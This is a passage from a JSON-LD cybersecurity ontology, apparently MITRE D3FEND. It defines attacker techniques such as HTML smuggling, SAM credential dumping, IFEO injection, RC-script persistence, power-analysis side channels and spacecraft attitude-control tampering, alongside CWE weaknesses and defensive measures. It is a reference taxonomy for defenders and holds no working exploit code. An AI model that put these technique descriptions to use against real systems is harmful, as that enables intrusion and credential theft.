      "d3f:definition": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)",
      "d3f:hides": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:label": "HTML Smuggling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1027"
        },
        {
          "@id": "_:Nd19b12b6a6d14ebe86dbfff1bf1ce926"
        },
        {
          "@id": "_:Nabdd756d493e403890dd9ab05008715b"
        }
      ]
    },
    {
      "@id": "_:Nd19b12b6a6d14ebe86dbfff1bf1ce926",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JavaScriptBlob"
      }
    },
    {
      "@id": "_:Nabdd756d493e403890dd9ab05008715b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hides"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:WindowsNtTerminateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtTerminateProcess",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITerminateProcess"
      }
    },
    {
      "@id": "d3f:CWE-204",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-204",
      "d3f:definition": "The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.",
      "rdfs:label": "Observable Response Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-203"
      }
    },
    {
      "@id": "d3f:detects",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x detects y: The entity x discovers the presence, occurrence, or state of entity y through observation or measurement.",
      "rdfs:label": "detects",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:counters"
        },
        {
          "@id": "d3f:d3fend-tactical-verb-property"
        }
      ]
    },
    {
      "@id": "d3f:DE-0011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0011",
      "d3f:definition": "Threat actors may leverage valid credentials to conduct unauthorized actions against a spacecraft or related system in a way that conceals their presence and evades detection. By using trusted authentication mechanisms attackers can blend in with legitimate operations and avoid triggering access control alarms or anomaly detection systems. This technique enables evasion by appearing authorized, allowing adversaries to issue commands, access sensitive subsystems, or move laterally within spacecraft or constellation architectures without exploiting software vulnerabilities. When credential use is poorly segmented or monitored, this form of access can be used to maintain stealthy persistence or facilitate other tactics under the guise of legitimate activity.",
      "d3f:uses": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Credentialed Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0011/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N67209b2dcc4c43d6a5d835a76d6cb4a9"
        }
      ],
      "skos:prefLabel": "Credentialed Evasion"
    },
    {
      "@id": "_:N67209b2dcc4c43d6a5d835a76d6cb4a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:T1037.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.004",
      "d3f:definition": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.",
      "d3f:modifies": {
        "@id": "d3f:SystemInitScript"
      },
      "rdfs:label": "RC Scripts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:N582bc616f2254bf2af26fcea32be31f6"
        }
      ]
    },
    {
      "@id": "_:N582bc616f2254bf2af26fcea32be31f6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemInitScript"
      }
    },
    {
      "@id": "d3f:RestoreEmail",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreEmail"
      ],
      "d3f:d3fend-id": "D3-RE",
      "d3f:definition": "Restoring an email for an entity to access.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Email"
      },
      "rdfs:label": "Restore Email",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreFile"
        },
        {
          "@id": "_:N30fa1db1989c4787840539c0980ed7e9"
        }
      ]
    },
    {
      "@id": "_:N30fa1db1989c4787840539c0980ed7e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:RandomForest",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RF",
      "d3f:definition": "Random Forest is a ML method that combines several other ML methods. At its core, Random Forest is an ensemble method of multiple bootstrapped decision trees filled with training data and random feature selection.",
      "d3f:kb-article": "## References\nRandom forest. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Random_forest).",
      "rdfs:label": "Random Forest",
      "rdfs:subClassOf": {
        "@id": "d3f:BootstrapAggregating"
      }
    },
    {
      "@id": "d3f:EXF-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.01",
      "d3f:definition": "The attacker infers secrets by measuring instantaneous power consumption of target devices, often crypto engines or controllers, and correlating traces with hypothesized internal operations. Simple power analysis (SPA) extracts structure (operation sequences, key-dependent branches); differential/correlation power analysis (DPA/CPA) uses many traces and statistics to recover key bits from tiny data-dependent variations. Practically, measurements may come from instrumented rails during I&T, from a compromised payload monitoring local supplies, or from co-located hardware that senses current/voltage fluctuations. With sufficient traces and alignment (triggering on command/crypto invocation), internal values become observable through their power signatures.",
      "rdfs:label": "Power Analysis Attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Power Analysis Attacks"
    },
    {
      "@id": "d3f:CWE-572",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-572",
      "d3f:definition": "The product calls a thread's run() method instead of calling start(), which causes the code to run in the thread of the caller instead of the callee.",
      "rdfs:label": "Call to Thread run() instead of start()",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-821"
      }
    },
    {
      "@id": "d3f:evaluates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x evaluates y: The entity x systematically assesses entity y to judge its state, quality, or risk.",
      "rdfs:label": "evaluates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-evaluate"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002179_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces the revocation of access authorizations resulting from changes to the security attributes of objects based on organization-defined rules governing the timing of revocations of access authorizations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002179"
    },
    {
      "@id": "d3f:T1003.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1003.002",
      "d3f:definition": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.",
      "d3f:may-access": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "d3f:Process"
        },
        {
          "@id": "d3f:SystemPasswordDatabase"
        }
      ],
      "rdfs:label": "Security Account Manager",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:N35b103b82ced4626a75a328de4500836"
        },
        {
          "@id": "_:N17c38b07120148289402e984a7d4cdc3"
        },
        {
          "@id": "_:N235eb82b63794720af35f3873b40e0ad"
        }
      ]
    },
    {
      "@id": "_:N35b103b82ced4626a75a328de4500836",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "_:N17c38b07120148289402e984a7d4cdc3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:N235eb82b63794720af35f3873b40e0ad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPasswordDatabase"
      }
    },
    {
      "@id": "d3f:CWE-289",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-289",
      "d3f:definition": "The product performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor.",
      "rdfs:label": "Authentication Bypass by Alternate Name",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:WebApplicationFirewall",
      "@type": "owl:Class",
      "d3f:definition": "A web application firewall (or WAF) filters, monitors, and blocks HTTP traffic to and from a web application. A WAF is differentiated from a regular firewall in that a WAF is able to filter the content of specific web applications while regular firewalls serve as a safety gate between servers. By inspecting HTTP traffic, it can prevent attacks stemming from web application security flaws, such as SQL injection, cross-site scripting (XSS), file inclusion, and security misconfigurations.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Web_application_firewall"
      },
      "rdfs:label": "Web Application Firewall",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationLayerFirewall"
      },
      "skos:altLabel": "WAF"
    },
    {
      "@id": "d3f:T1556.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.004",
      "d3f:definition": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.",
      "rdfs:label": "Network Device Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:CWE-166",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-166",
      "d3f:definition": "The product receives input from an upstream component, but it does not handle or incorrectly handles when an expected special element is missing.",
      "rdfs:label": "Improper Handling of Missing Special Element",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-159"
        },
        {
          "@id": "d3f:CWE-228"
        },
        {
          "@id": "d3f:CWE-703"
        }
      ]
    },
    {
      "@id": "d3f:CWE-643",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-643",
      "d3f:definition": "The product uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.",
      "rdfs:label": "Improper Neutralization of Data within XPath Expressions ('XPath Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-91"
        },
        {
          "@id": "d3f:CWE-943"
        }
      ]
    },
    {
      "@id": "d3f:TA0037",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Command and Control - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Command and Control"
    },
    {
      "@id": "d3f:T1593.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1593.003",
      "d3f:definition": "Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.",
      "rdfs:label": "Code Repositories",
      "rdfs:subClassOf": {
        "@id": "d3f:T1593"
      }
    },
    {
      "@id": "d3f:T1027",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027",
      "d3f:definition": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.",
      "rdfs:label": "Obfuscated Files or Information",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:OperationalDependencyMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalDependencyMapping"
      ],
      "d3f:d3fend-id": "D3-ODM",
      "d3f:definition": "Operational dependency mapping identifies and models the dependencies of the organization's activities on each other and on the organization's performers (people, systems, and services.)  This may include modeling the higher- and lower-level activities of an organization forming a hierarchy, or layering, of the dependencies in an organization's activities.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-CyberCommandSystemCYCS"
        },
        {
          "@id": "d3f:Reference-DaggerFactSheet"
        },
        {
          "@id": "d3f:Reference-DaggerModelingAndVisualizationForMissionImpactSituationalAwareness"
        },
        {
          "@id": "d3f:Reference-MissionDependencyModelingForCyberSituationalAwareness"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": [
        {
          "@id": "d3f:Dependency"
        },
        {
          "@id": "d3f:OperationalActivityPlan"
        }
      ],
      "rdfs:label": "Operational Dependency Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "_:N79dd15e16eda443ab39aa6f94ef25bad"
        },
        {
          "@id": "_:N88105b6276ef43bf87df4c1a575f4c40"
        }
      ]
    },
    {
      "@id": "_:N79dd15e16eda443ab39aa6f94ef25bad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "_:N88105b6276ef43bf87df4c1a575f4c40",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperationalActivityPlan"
      }
    },
    {
      "@id": "d3f:EmailSendEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an email is transmitted from a client to a recipient via a mail server. This process often involves protocols such as SMTP or its secure variants, with potential authentication and encryption for secure delivery.",
      "rdfs:label": "Email Send Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EmailEvent"
      }
    },
    {
      "@id": "d3f:CentralProcessingUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ProcessorRegister"
      },
      "d3f:definition": "A central processing unit (CPU), also called a central processor, main processor or just processor, is the electronic circuitry that executes instructions comprising a computer program. The CPU performs basic arithmetic, logic, controlling, and input/output (I/O) operations specified by the instructions in the program. This contrasts with external components such as main memory and I/O circuitry, and specialized processors such as graphics",
      "d3f:may-contain": [
        {
          "@id": "d3f:CacheMemory"
        },
        {
          "@id": "d3f:MemoryManagementUnit"
        },
        {
          "@id": "d3f:MemoryProtectionUnit"
        }
      ],
      "d3f:synonym": [
        "CPU",
        "Central Processor",
        "Main Processor"
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Central_processing_unit"
      },
      "rdfs:label": "Central Processing Unit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Processor"
        },
        {
          "@id": "_:Ncf852adb3a4746288bd8725fb46e6cec"
        },
        {
          "@id": "_:N0b512f08a851496d9cce93e3b83bb964"
        },
        {
          "@id": "_:N7f771a82508c4557babc85d1150d59c1"
        },
        {
          "@id": "_:N29ad764f13b34bd18946727f68225971"
        }
      ]
    },
    {
      "@id": "_:Ncf852adb3a4746288bd8725fb46e6cec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessorRegister"
      }
    },
    {
      "@id": "_:N0b512f08a851496d9cce93e3b83bb964",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CacheMemory"
      }
    },
    {
      "@id": "_:N7f771a82508c4557babc85d1150d59c1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryManagementUnit"
      }
    },
    {
      "@id": "_:N29ad764f13b34bd18946727f68225971",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryProtectionUnit"
      }
    },
    {
      "@id": "d3f:T1505.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:Software"
      },
      "d3f:attack-id": "T1505.004",
      "d3f:definition": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)",
      "rdfs:label": "IIS Components",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1505"
        },
        {
          "@id": "_:Nb3cc9982fa324dfab2fc1c99b8cf3242"
        }
      ]
    },
    {
      "@id": "_:Nb3cc9982fa324dfab2fc1c99b8cf3242",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:CWE-666",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-666",
      "d3f:definition": "The product performs an operation on a resource at the wrong phase of the resource's lifecycle, which can lead to unexpected behaviors.",
      "rdfs:label": "Operation on Resource in Wrong Phase of Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CWE-558",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-558",
      "d3f:definition": "The product uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values.",
      "rdfs:label": "Use of getlogin() in Multithreaded Application",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-663"
      }
    },
    {
      "@id": "d3f:T1667",
      "@type": "owl:Class",
      "d3f:attack-id": "T1667",
      "d3f:definition": "Adversaries may flood targeted email addresses with an overwhelming volume of messages. This may bury legitimate emails in a flood of spam and disrupt business operations.(Citation: sophos-bombing)(Citation: krebs-email-bombing)",
      "rdfs:label": "Email Bombing",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0074",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0074",
      "d3f:definition": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.",
      "rdfs:label": "Masquerading - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0074"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Masquerading"
    },
    {
      "@id": "d3f:AML.T0017.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0017.000",
      "d3f:definition": "Adversaries may develop their own adversarial attacks.\nThey may leverage existing libraries as a starting point ([Adversarial AI Attack Implementations](/techniques/AML.T0016.000)).\nThey may implement ideas described in public research papers or develop custom made attacks for the victim model.",
      "rdfs:label": "Adversarial AI Attacks - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0017.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0017"
      },
      "skos:prefLabel": "Adversarial AI Attacks"
    },
    {
      "@id": "d3f:CWE-375",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-375",
      "d3f:definition": "Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function.",
      "rdfs:label": "Returning a Mutable Object to an Untrusted Caller",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:AML.T0010.004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.004",
      "d3f:definition": "An adversary may compromise a victim's container registry by pushing a manipulated container image and overwriting an existing container name and/or tag. Users of the container registry as well as automated CI/CD pipelines may pull the adversary's container image, compromising their AI Supply Chain. This can affect development and deployment environments.\n\nContainer images may include AI models, so the compromised image could have an AI model which was manipulated by the adversary (See [Manipulate AI Model](/techniques/AML.T0018)).",
      "rdfs:label": "Container Registry - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "Container Registry"
    },
    {
      "@id": "d3f:SoftwarePackagingTool",
      "@type": "owl:Class",
      "d3f:definition": "A tool that automates the process of packaging either or both binary code  and source code for use on one or more target platforms.",
      "rdfs:label": "Software Packaging Tool",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Build_automation"
        },
        {
          "@id": "dbr:Package_manager"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:BuildTool"
      }
    },
    {
      "@id": "d3f:T1666",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1666",
      "d3f:definition": "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.",
      "d3f:modifies": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Modify Cloud Resource Hierarchy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N9361d1fa22a44c199be56cfc3b508310"
        }
      ]
    },
    {
      "@id": "_:N9361d1fa22a44c199be56cfc3b508310",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:RemoteSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A remote login session is a login session where a client has logged in from their local host machine to a server via a network.",
      "rdfs:label": "Remote Session",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:T1546.012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.012",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\\dbg\\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "Image File Execution Options Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N6bc9a27008834b87ac5205691a585071"
        }
      ]
    },
    {
      "@id": "_:N6bc9a27008834b87ac5205691a585071",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CloudConfigurationModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that updates cloud-hosted resource configurations such as IAM policies, virtual network constructs, storage settings, or managed-service parameters; impacting resource provisioning, access control, functionality, or compliance.",
      "rdfs:label": "Cloud Configuration Modification Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationModificationEvent"
        },
        {
          "@id": "_:Naaa884e9713243958b253d088a2a0839"
        }
      ]
    },
    {
      "@id": "_:Naaa884e9713243958b253d088a2a0839",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:EX-0012.08",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.08",
      "d3f:definition": "ADCS depends on tightly coupled models and parameters: star-tracker catalogs and masks, sensor alignments and bias terms, gyro scale factors and drift rates, estimator covariances and process/measurement noise, controller gains and saturation limits, wheel/CMG torque constants, magnetic torquer maps, and sun sensor thresholds. Editing these values skews estimation or control, producing slow bias, limit cycles, loss of lock, or abrupt safing triggers. For example, a small change to a star-tracker mask can force frequent dropouts; an inflated gyro bias drives the filter away from truth; softened actuator limits or mis-set gains let disturbances accumulate; altered sun-point entry criteria cause unnecessary mode switches. Secondary impacts propagate to power, thermal, and communications because pointing and geometry underpin array generation, radiator view factors, and antenna gain. The technique turns the spacecraft against itself by nudging the parameters that close the loop between what the vehicle believes and how it responds.",
      "rdfs:label": "Attitude Determination & Control Subsystem - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/08/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Attitude Determination & Control Subsystem"
    },
    {
      "@id": "d3f:recorded-in",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x recorded-in y: The event x is documented, logged, or otherwise preserved within the digital artifact y, which stores or encodes relevant data about the event.",
      "owl:inverseOf": {
        "@id": "d3f:records"
      },
      "rdfs:label": "recorded-in",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-941",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-941",
      "d3f:definition": "The product creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor.",
      "rdfs:label": "Incorrectly Specified Destination in a Communication Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-3_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "d3f:MessageAnalysis"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "d3f:UserBehaviorAnalysis"
        }
      ],
      "d3f:control-name": "Risk Assessment | Dynamic Threat Awareness",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "RA-3(3)"
    },
    {
      "@id": "d3f:C5.0",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-C5.",
      "d3f:definition": "C5.0 is the next version of C4.5, which in turn is the upgrade from ID3. The only difference between C5.0 and C4.5 is some improvements made to C5.0.",
      "d3f:kb-article": "## References\nC4.5 algorithm. Wikipedia. [Link](https://en.wikipedia.org/wiki/C4.5_algorithm).",
      "rdfs:label": "C5.0",
      "rdfs:subClassOf": {
        "@id": "d3f:DecisionTree"
      }
    },
    {
      "@id": "d3f:AgentAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AgentAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:Agent"
      },
      "d3f:d3fend-id": "D3-AA",
      "d3f:definition": "Agent authentication is the process of verifying the identities of agents to ensure they are authorized and trustworthy participants within a system.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
      },
      "d3f:strengthens": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Agent Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N21cd21f6d6934bc49d336fd6fe2bd7f8"
        },
        {
          "@id": "_:Nd4636a3475f04e8680baba6a09bac422"
        },
        {
          "@id": "_:N00dd8341a8244b64b80825200cde0a05"
        }
      ]
    },
    {
      "@id": "_:N21cd21f6d6934bc49d336fd6fe2bd7f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "_:Nd4636a3475f04e8680baba6a09bac422",
